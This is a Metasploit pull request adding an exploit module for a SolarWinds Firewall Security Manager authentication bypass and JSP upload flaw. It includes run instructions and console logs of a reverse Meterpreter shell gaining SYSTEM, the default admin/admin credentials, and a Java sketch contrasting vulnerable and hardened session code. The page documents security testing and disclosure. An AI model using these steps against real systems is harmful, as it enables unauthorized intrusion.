
Add CVE-2015-2284: Solarwinds Firewall Security Manager 6.6.5 Session Handling Vulnerability #5050

Status: Merged (5 commits, merged Apr 3, 2015)

Conversation

wchen-r7 (Contributor) commented Apr 1, 2015

This module exploits multiple problems against Solarwinds Firewall Security Manager 6.6.5. The first one is an authentication bypass due to the improper use of session.putValue, allowing the attacker to set the "username" attribute. The second problem is that the fileUpload action will only check the "username" attribute before authorizing the upload resource, which can be abused to upload a malicious JSP payload, and this will result in arbitrary code execution under the context of SYSTEM.

To prepare for testing

  • A server-class Windows host, such as: Windows Server 2003 or later (including SP2), Server 2003 R2 or later (including SP2), Server 2008 or later (including SP2), Server 2008 R2 or later (including SP1), Server 2012.
  • Download Solarwinds Firewall Security Manager 6.6.5 and install it. The official download link is here: http://www.solarwinds.com/firewall-security-manager.aspx

The specific setup I have is this: Windows Server 2008 Enterprise SP2, with Solarwinds FSM 6.6.5 (build 6.6.5-115-20141020, express install). If you no longer have the vulnerable version, you can try my box instead in person.

Testing

  • First, open a browser, and then go to: http://[IP]:48080/ to make sure you can actually connect to FSM's web interface. If port 48080 isn't there, then try 8080
  • Start msfconsole
  • Do: use exploit/windows/http/solarwinds_fsm_userlogin
  • Do: set rhost [IP]
  • Do: run
  • You should get a session like the following demo:
$ msfconsole
msf > use exploit/windows/http/solarwinds_fsm_userlogin 
msf exploit(solarwinds_fsm_userlogin) > set rhost 192.168.1.169
rhost => 192.168.1.169
msf exploit(solarwinds_fsm_userlogin) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] 192.168.1.169:48080 - Auth bypass: Putting session value: username=admin
[*] 192.168.1.169:48080 - Your SID is: JSESSIONID=1ehx5ezth8ktxu33axxaj8b40
[*] 192.168.1.169:48080 - Uploading file: YUbnH.jsp (73802 bytes)
[*] 192.168.1.169:48080 - Payload being treated as XLS, indicates a successful upload.
[*] 192.168.1.169:48080 - Attempting to execute the payload.
[*] Sending stage (785920 bytes) to 192.168.1.169
[+] Deleted ../plugins/com.lisletech.athena.http.servlets_1.2/jsp/YUbnH.jsp

meterpreter >

Note: The default password to login as admin is "admin", in case you're curious. The exploit does not need to use this though.
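An added illustration of the two weaknesses the PR describes, written as a hypothetical Java servlet helper rather than SolarWinds FSM's or the module's own code: the weak session handling and upload check beside a hardened version. The `Authenticator` interface, the `AUTH_KEY` name and the permitted spreadsheet extensions are assumptions.

```java
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;
import java.util.Map;

public class SessionHandlingDemo {

    // Hypothetical credential check, supplied by the caller (assumption).
    public interface Authenticator {
        boolean check(String user, char[] password);
    }

    // VULNERABLE: every request parameter is copied into the session with the
    // deprecated putValue, so a client can set "username" without logging in.
    static void vulnerablePutValues(HttpServletRequest req) {
        HttpSession session = req.getSession(true);
        for (Map.Entry<String, String[]> e : req.getParameterMap().entrySet()) {
            session.putValue(e.getKey(), e.getValue()[0]);
        }
    }

    // VULNERABLE: the upload action treats a present "username" attribute as
    // proof of authentication, which is exactly the attribute the client set.
    static boolean vulnerableUploadAllowed(HttpSession session) {
        return session.getAttribute("username") != null;
    }

    // HARDENED: only the login path writes the authenticated principal, under
    // a key that client input can never name (key name is an assumption).
    static final String AUTH_KEY = "app.authenticatedUser";

    static boolean login(HttpServletRequest req, String user, char[] password,
                         Authenticator auth) {
        if (!auth.check(user, password)) return false;
        HttpSession old = req.getSession(false);
        if (old != null) old.invalidate();      // fresh session id after login
        req.getSession(true).setAttribute(AUTH_KEY, user);
        return true;
    }

    // HARDENED: authorization reads the server-set principal, and the upload
    // accepts only the spreadsheet types the feature is meant to import, so a
    // JSP never lands in a directory the container will execute.
    static boolean hardenedUploadAllowed(HttpSession session, String filename) {
        if (session == null || session.getAttribute(AUTH_KEY) == null) return false;
        String lower = filename.toLowerCase();
        return !lower.contains("..")
            && (lower.endsWith(".xls") || lower.endsWith(".xlsx"));
    }
}
```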

void-in (Contributor) commented Apr 1, 2015

@wchen-r7 The default port is 48480 or 48080? Here you have mentioned the first but in the module description it is the second. I guess a typo but not sure which one.

wchen-r7 (Contributor, Author) commented Apr 1, 2015

Ah, should be 48080. I made a typo. Thanks!

@jvazquez-r7 jvazquez-r7 self-assigned this Apr 3, 2015
jvazquez-r7 (Contributor) commented:

Tested ok:

msf > use exploit/windows/http/solarwinds_fsm_userlogin
msf exploit(solarwinds_fsm_userlogin) > set rhost 172.16.158.131
rhost => 172.16.158.131
msf exploit(solarwinds_fsm_userlogin) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.131:48080 - Auth bypass: Putting session value: username=admin
[*] 172.16.158.131:48080 - Your SID is: JSESSIONID=bo74uo5gnkjgyeypj47wxznh
[*] 172.16.158.131:48080 - Uploading file: rIfVF.jsp (73802 bytes)
[*] 172.16.158.131:48080 - Payload being treated as XLS, indicates a successful upload.
[*] 172.16.158.131:48080 - Attempting to execute the payload.
[*] Sending stage (785920 bytes) to 172.16.158.131
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.131:1264) at 2015-04-03 13:44:21 -0500
[+] Deleted ../plugins/com.lisletech.athena.http.servlets_1.2/jsp/rIfVF.jsp

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

landing!

@jvazquez-r7 jvazquez-r7 merged commit 0b14a18 into rapid7:master Apr 3, 2015
jvazquez-r7 (Contributor) commented:

Ready! Just did minor cleanup here: 7c9b19c

Thanks!

todb-r7 pushed a commit to todb-r7/metasploit-framework that referenced this pull request Apr 6, 2015
Removing the second person pronoun usage.

[See rapid7#5050]